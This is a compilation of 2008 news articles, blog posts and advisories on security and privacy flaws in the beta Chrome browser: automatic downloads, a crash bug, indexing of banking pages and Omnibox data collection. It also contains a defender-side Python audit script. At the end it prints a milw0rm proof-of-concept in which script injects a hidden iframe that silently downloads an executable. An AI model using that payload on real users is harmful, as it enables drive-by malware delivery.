Google's Chrome Browser Not Yet Secure
September 3, 2008
"Google's Chrome browser is only a day old, but security researchers
already have found vulnerabilities that can be exploited."
"According to a report published by ZDNet, security researcher Aviv Raff
has found that he can combine a flaw in the open source WebKit engine with
a Java bug to dupe Chrome users into downloading executable files."
"Apple, which uses WebKit in its Safari browser, fixed this flaw with its
Safari 3.1.2 browser patch. Chrome uses an older version of WebKit that
has not been repaired."
"Another security researcher, Rishi Narang, claimed to have found a way to
crash Chrome with a malicious link."
""An issue exists in how chrome behaves with undefined-handlers in
chrome.dll version 0.2.149.27," Narang explained on the Evil Fingers Web
site. "A crash can result without user interaction. When a user is made to
visit a malicious link, which has an undefined handler followed by a
'special' character, the Chrome crashes with a Google Chrome message
window 'Whoa! Google Chrome has crashed. Restart now?'""
"And someone identified as "Nerex" has posted proof-of-concept JavaScript
code on Milw0rm.com that supposedly "allows files (e.g., executables) to
be automatically downloaded to the user's computer without any user
prompt.""
"This exploit appears to be similar to the one identified by Raff."
"In theory, Google Chrome should be more secure than other browsers
because, rather than being a single-threaded application, each tab is
handled by its own sandboxed process with its own memory space. Like a
multiengine plane, Chrome is designed not to crash following the loss of a
single engine."
""[Chrome] utilizes technology that has historically been associated with
operating systems to create isolation between different browser tabs with
the aim of improved crash-resistance and security," IDC analyst Al Hilwa
said in a research note. "The security capabilities also ensue from a new
sandbox model that strengthens what is typically available today from
other browsers.""
"But Chrome is beta software and remains a work in progress."
"Hilwa observes that while Google's security architecture isolates the
browser's kernel from attacks on rendering-engine vulnerabilities, it
doesn't extend this same protection to plug-ins like Java, Flash, and
Silverlight."
"Mozilla software engineer Robert O'Callahan in a blog post said that
while Chrome looks promising, Google's coders still have challenges to
overcome. "There are some interesting architectural problems they haven't
solved yet, especially with the process separation model, especially with
regard to windowless plugins, and also Mac," he said. "These are problems
that will be encountered by anyone doing process separation so it will be
interesting to see how that goes.""
http://www.informationweek.com/news/internet/google/showArticle.jhtml;jsessionid=BGWZLKEWFDCRKQSNDLPSKH0CJUNN2JVN?articleID=210300297
Google Chrome vulnerable to carpet-bombing flaw
September 2, 2008
"Google's shiny new Web browser is vulnerable to a carpet-bombing
vulnerability that could expose Windows users to malicious hacker
attacks."
"Just hours after the release of Google Chrome, researcher Aviv Raff
discovered that he could combine two vulnerabilities - a flaw in Apple
Safari (WebKit) and a Java bug discussed at this year's Black Hat
conference - to trick users into launching executables direct from the new
browser."
"Raff has cooked up a harmless demo of the attack in action, showing how
Google Chrome users can be lured into downloading and launching a JAR
(Java Archive) file that gets executed without warning."
"In the proof-of-concept, Raff's code shows how a malicious hacker can use
a clever social engineering lure - it requires two mouse clicks - to plant
malware on Windows desktops."
"The Google Chrome user-agent shows that Chrome is actually WebKit 525.13
(Safari 3.1), which is an outdated/vulnerable version of that browser."
"Apple patched the carpet-bombing issue with Safari v3.1.2."
"Some Google Chrome early adopters using Windows Vista are reporting that
files downloaded from the Internet are automatically dropped on the
desktop, setting up a scenario where a combo-attack using this unpatched
IE flaw could be used in attacks."
http://blogs.zdnet.com/security/?p=1843
Google Mule
September 3, 2008
"In real life, when you take two species, a horse and a donkey, and mix
them up you get a mule. In the browsers world, when you take a horse
(Firefox/IE) and a donkey (Safari) and mix them up, you get - Google
Chrome."
"The new browser from Google tries to get the best from other browsers,
but instead (well, at least in the current beta version), it seems to be
doing quite the opposite."
"The current beta uses an old version of WebKit - 525.13 - which is
actually the same WebKit engine used by the old Safari v3.1. The current
Safari version is v3.1.2, which fixed several critical issues, including
the "blended threat" Carpet Bombing vulnerability. Google even mentions
that they use the Safari v3.1 rendering engine in their own documentation
(Thanks Yonatan Grabber for the information!)"
"On the other hand, Chrome borrowed (and modified) local resource files
from the Mozilla project. And also, for some reason, in some cases there
is an ActiveX plug-in loaded by Chrome, which might be evidence that this
browser is capable of executing ActiveX controls."
"I really wonder why Google have taken several features from other
browsers and mixed them all together. Security wise, it's very
problematic."
"They'll have to track all security vulnerabilities in those features, and
fix them in Chrome too. This will probably be only after those
vulnerabilities were fixed by the other vendors or were publicly reported.
It will put Chrome users at risk for a long time."
"Back to the WebKit issue. I've created a proof-of-concept which
demonstrates the automatic download vulnerability that was already fixed
by Apple. This PoC will automatically download a JAR file and place it in
the downloads folder (there are reports that in some cases it will
download it to the Desktop, as in Safari. In those cases, the
Safari-Pwns-IE exploit can be easily converted to a Chrome-Pwns-IE
exploit)."
"Unfortunately, whenever Google Chrome downloads a file, it creates a
download bar at the bottom of the page, which seems, to the untrained
eye, to be part of the page. The downloaded filename is displayed as a
button, and one click on this button will execute the file. If the
file is an executable (e.g. .EXE, .BAT, etc.), Windows Explorer will show
a warning that this file was downloaded from the Internet. In this case,
Google Chrome does a good job by setting the Zone.Identifier in the
alternative data stream."
"However, as was mentioned by pdp at his great Black Hat talk this August,
when Windows Explorer tries to execute a JAR file, it will
automatically run the associated application, which in most cases is the
JRE (Java Runtime Environment). The JRE will not check the Zone.Identifier
in the alternative data stream, and will execute the JAR file with no
warning. A JAR file, of course, should be treated as any other executable
file. This is again a sort of "blended threat". Two small issues in
different products, when blended together, create a much larger problem."
"In conclusion, Chrome seems to be a very nice and slick browser, but it
is far from being as secure as it is advertised by Google. It borrows
several insecure features from other browsers, and it has its own security
design flaws."
http://aviv.raffon.net/2008/09/03/GoogleMule.aspx
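As an added, defender-side illustration of the Zone.Identifier point in the post above (not code from the post, Google, or any of the sources quoted here), this Python helper parses the Zone.Identifier stream format and flags downloads whose handler the post says ignores the mark. The sample filenames and stream contents are constructed, and the handler table is an assumption limited to the one case the post describes (JAR files opened by the JRE).

```python
# Audit downloaded files for Mark-of-the-Web coverage (Zone.Identifier stream).
# Explorer warns before running a marked .exe/.bat, but per the post above the
# JRE that opens a .jar does not consult the mark, so no warning ever appears.
import os
from typing import Dict, Optional

# ZoneId values for which Explorer shows the "downloaded from the Internet" warning
ZONES_THAT_WARN = {3, 4}  # 3 = Internet zone, 4 = Restricted sites zone
# Assumption: extensions dispatched to an application that ignores Zone.Identifier,
# limited to the one case the post describes (JAR -> Java Runtime Environment).
MOTW_IGNORING_HANDLERS = {".jar": "JRE"}

def parse_zone_identifier(stream_text: str) -> Dict[str, str]:
    """Parse the INI-style stream ([ZoneTransfer] section) into {key: value}."""
    fields: Dict[str, str] = {}
    in_section = False
    for raw in stream_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[zonetransfer]"
        elif in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    return fields

def assess_download(filename: str, stream_text: Optional[str]) -> Dict[str, object]:
    """Decide whether the user would see a warning before this download runs."""
    fields = parse_zone_identifier(stream_text or "")
    zone_id = int(fields["ZoneId"]) if fields.get("ZoneId", "").isdigit() else None
    marked = zone_id in ZONES_THAT_WARN
    ext = os.path.splitext(filename)[1].lower()
    if not marked:
        risk = "no mark: nothing for any handler to warn about"
    elif ext in MOTW_IGNORING_HANDLERS:
        risk = f"handler ignores Zone.Identifier ({MOTW_IGNORING_HANDLERS[ext]})"
    else:
        risk = "ok: Explorer shows the download warning"
    warning_shown = marked and ext not in MOTW_IGNORING_HANDLERS
    return {"file": filename, "zone": zone_id, "marked": marked,
            "warning_shown": warning_shown, "risk": risk}

# Constructed sample: filename -> Zone.Identifier stream text (None = no stream)
SAMPLE_DOWNLOADS = {
    "setup.exe": "[ZoneTransfer]\r\nZoneId=3\r\n",
    "tool.jar": "[ZoneTransfer]\r\nZoneId=3\r\nHostUrl=http://example.com/tool.jar\r\n",
    "notes.txt": None,
}

def audit(downloads: Dict[str, Optional[str]]):
    """Assess every download; returns a list of result dicts in input order."""
    return [assess_download(name, stream) for name, stream in downloads.items()]

if __name__ == "__main__":
    for result in audit(SAMPLE_DOWNLOADS):
        print(result)
```

On a real Windows box the stream text is read from `<file>:Zone.Identifier`; the audit shows that a marked .jar and a marked .exe carry the same mark, and only the dispatch path differs.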
Chrome
September 3, 2008
"A few people I know have asked me what I think about Google's Chrome
browser."
"Technically, it looks good on paper. There are some interesting
architectural problems they haven't solved yet, especially with the
process separation model, especially with regard to windowless plugins,
and also Mac. These are problems that will be encountered by anyone doing
process separation so it will be interesting to see how that goes. V8
seems overhyped when you take into account the JS work being done by other
browser vendors."
"I'm not sure how the competitive landscape is going to play out.
Mozilla's in a strong position now and the immediate future looks great.
We just need to stay focused, keep making smart decisions, and keep
shipping great software."
"Overall, I'm actually really excited. No matter who gains and who loses,
there's no doubt that this innovation and investment and energy is great
for the Web (especially when it's delivered in free software)."
http://weblogs.mozillazine.org/roc/archives/2008/09/chrome.html
Google Chrome privacy issues, and user tips
September 4, 2008
"TG Daily has an interesting story, Chrome is a security nightmare. It
turns out that Chrome indexes and stores your bank account and other
personal financial information even on secure (https://) pages, though
whether it's actually a "security nightmare" is another issue."
"Do the stuff you would normally do like look at your balances and gawk at
your latest transactions and then open up a new tab in Chrome by clicking
the "+" symbol. In the right-hand history search box, enter a few keywords
and see what they get you. Surprised? I bet you are."
"The history search feature means you can find all your financial, medical
and other secrets from the browser without going anywhere near the secure
site. Or someone else can. If you have a PC where someone else can access
it -- for example, in almost any office -- then it's a recipe for
disaster. Since you'll never remember to always use the "porn mode"
(InCognito), then the best answer may be to stay well away from anything
password protected and personal."
"The Electronic Frontier Foundation has a different concern. It says,
according to CNet's headline, We're concerned about Google's Omnibox.
There's a privacy issue because anything you type in gets sent back to the
Google mothership, and it's storing some of it. The ways to avoid that
include (1) turn off auto-suggest; or (2) use a default search engine that
isn't Google; or (3) use porn mode. Any one will do."
"Still, EFF staff technologist Peter Eckersley says: "We are genuinely
really worried about the Omnibox thing. It's just one more piece of the
complete puzzle of Google seeing everything that everyone is doing.""
"Simon Davies, Founder of Privacy International and a senior fellow with
the Electronic Privacy Information Center (EPIC) also expressed concern
over the Omnibox feature."
""I'm astonished that these terms are sent to Google even without the
return being hit," Davies said. "That is beyond anything that Google has
ever contemplated before.""
"Hmm, well, if Google has already stored every search you've made there,
and it has all your email, and your calendar, and your docs, and your
photos, and it knows where you are going and when and why, it may be a bit
late to complain about things like that....."
"Runs faster, crashes faster: Sorry, I forgot to include the (mercifully
short) story of the day: you can crash Chrome by typing :% in the address
bar. I expect someone will figure out how to crash it remotely, if they
haven't already done so...."
http://blogs.guardian.co.uk/technology/2008/09/04/google_chrome_privacy_issues_and_user_tips.html
Chrome is a security nightmare, indexes your bank accounts
September 4, 2008
"Can a browser's search function work too well? After playing around with
Google's brand new Chrome browser, we've discovered that its history
search box will fetch all types of data - even text from HTTPS-protected
financial sites like Washington Mutual and Capital One. With a few
utterly simple keywords like balance, account and Sept., everything from
balance information, account numbers and even how much you spent at Costco
can be pulled up."
"To see all of this in action, just open up Chrome and log in to your
favorite financial website. Like most important sites, it should be
protected with HTTPS/SSL encryption and that should be evident in the
address bar of the browser. Do the stuff you would normally do like look
at your balances and gawk at your latest transactions and then open up a
new tab in Chrome by clicking the "+" symbol. In the right-hand history
search box, enter a few keywords and see what they get you. Surprised? I
bet you are. No luck? Then try something simple like oh Visa,
Mastercard, balance and account. Also try out the names and abbreviations
of months like September, Sept and Sep."
"If you're like me, you probably saw account balances and some transaction
details, but if you further refine your keywords you'd be able to see a
lot more. We first discovered this "problem" by browsing the
forensicfocus.com forums. "Problem" is in quotes because we're not sure
if this is a true vulnerability or Google Chrome's search function working
as intended - in this case, just too damn good. While playing around with
the forensic implications of Chrome, "Jelle" on the forums posted that he
and his partner noticed the browser was indexing information from HTTPS
sites."
""One interesting finding is that in the regular browsing mode, Chrome
creates a search index of the contents of a lot of the pages you visit.
This allows you to do keyword searching in your own web history. On some
of our tests, we found that content of https pages had been indexed as
well, allowing us to retrieve our bank account details using a keyword
search," Jelle posted."
"Is there a way to protect your financial information from being indexed?
Google Chrome does have an incognito mode that promises to not cache
anything. This can be accessed from the file menu in the upper-right
corner of the window or by using the keyboard shortcut (Control Shift N).
You can also clear your browser data after surfing to a financial website
by going to the tools menu that's also in the upper-right corner."
"It was just yesterday that I wrote about Chrome's security as being "not
bad", but I personally don't get a warm and fuzzy feeling if Chrome is
indexing all of my financial information. Search and indexing is what
Google is good at and the company has made my life a whole lot easier in
many ways, but indexing financial info is crossing the line."
"On the programming level, I can't really blame Google's developers though
because HTTPS was never meant to provide any protection anyway on the
desktop itself. The protection was developed to protect traffic as it
travelled through the "Wild West" Internet. But while this distinction is
clear to most of our readers - the regular person probably believes
HTTPS/SSL traffic is and should be protected on the desktop."
"So is this all a big deal? Well anyone who wants to search your
financial information would need local access to your machine and if a
person is sitting at your computer, you have a lot more things to worry
about than him/her using Chrome's history search. Conceivably a hacker
could develop an app to pull the cache and index files off your computer
and examine them later on another machine - these files reside in the
"C:\Documents and Settings\USERNAME\Local Settings\Application
Data\Google\Chrome\User Data\Default" folder."
"But on a simpler level, if ALL of the sites I visit are being keyworded
and indexed locally, then how do I know that this information will stay
local. I guess that depends on how much you trust Google."
http://www.tgdaily.com/content/view/39176/108/
EFF: We're concerned about Google's Omnibox
September 3, 2008
"Privacy advocates are starting to sound the alarm over a feature in
Google's Chrome that sends anything typed in the browser's Omnibox back to
Google."
"Google told CNET News earlier Wednesday that it plans to store about 2
percent of the data it gets back, along with the IP address of the
computer that sent it. Google said it won't receive or store data if users
turn off the auto-suggest feature or if they select a default search
provider other than Google or if they are using the product's "Incognito"
mode."
"Still, EFF staff technologist Peter Eckersley said in an interview that
he is concerned about Google having yet another window into what the world
is browsing."
""We're worried that Chrome will be another giant conveyer belt moving
private information about our use of the Web into Google's data vaults,"
Eckersley said. "Google already knows far too much about what everybody is
thinking at any given moment."
""The addition of Incognito is great," he said, adding that Google is
making some strides with Chrome, clearly recognizing that people want to
be able to surf the Web without having a record of it stored in various
places."
""We are genuinely really worried about the Omnibox thing," he said. "It's
just one more piece of the complete puzzle of Google seeing everything
that everyone is doing.""
http://news.cnet.com/8301-13860_3-10032047-56.html
Google admits Chrome tracks web addresses
September 4, 2008
"Google has admitted the auto-suggest feature of Chrome's Omnibox gives it
potential access to users' keystrokes, providing the company with a wealth
of information on the browsing habits of its users."
""When you type URLs or queries in the address bar, the letters you type
are sent to Google so the Suggest feature can automatically recommend
terms or URLs you may be looking for," the company notes in its privacy
policy."
""If you choose to share usage statistics with Google and you accept a
suggested query or URL, Google Chrome will send that information to Google
as well. You can disable this feature.""
"Unlike searching through Google, so long as the user has auto-suggest
enabled, and Google set as their default search engine, the Omnibox will
grant Google access to search enquiries without the user ever hitting the
enter key."
"Google says it intends to store about 2% of this information, alongside
the IP address of the computer that typed it."
"Given that current figures reveal Chrome has already grabbed 1% of the
browser market, this could represent a huge amount of information."
http://www.pcpro.co.uk/news/222834/google-admits-chrome-tracks-web-addresses.html
Google Chrome Browser 0.2.149.27
"Software:"
"Google Chrome Browser 0.2.149.27"
"Tested:"
"Windows XP Professional SP3"
"Result:"
"Google Chrome Crashes with All Tabs"
"Problem:"
"An issue exists in how chrome behaves with undefined-handlers in
chrome.dll version 0.2.149.27. A crash can result without user
interaction. When a user is made to visit a malicious link, which has an
undefined handler followed by a 'special' character, the chrome crashes
with a Google Chrome message window "Whoa! Google Chrome has crashed.
Restart now?". It crashes on "int 3" at 0x01002FF3 as an exception/trap,
followed by "POP EBP" instruction when pointed out by the EIP register at
0x01002FF4."
http://evilfingers.com/advisory/google_chrome_poc.php
Author: nerex
"E-mail: nerex[at]live[dot]com"
"Google's new Web browser (Chrome) allows files (e.g., executables) to be
automatically downloaded to the user's computer without any user prompt."
"This proof-of-concept was created for educational purposes only."
"Use the code it at your own risk."
"The author will not be responsible for any damages."
"Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)"
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0"></iframe>');
</script>
"# milw0rm.com [2008-09-03]"
http://www.milw0rm.com/exploits/6355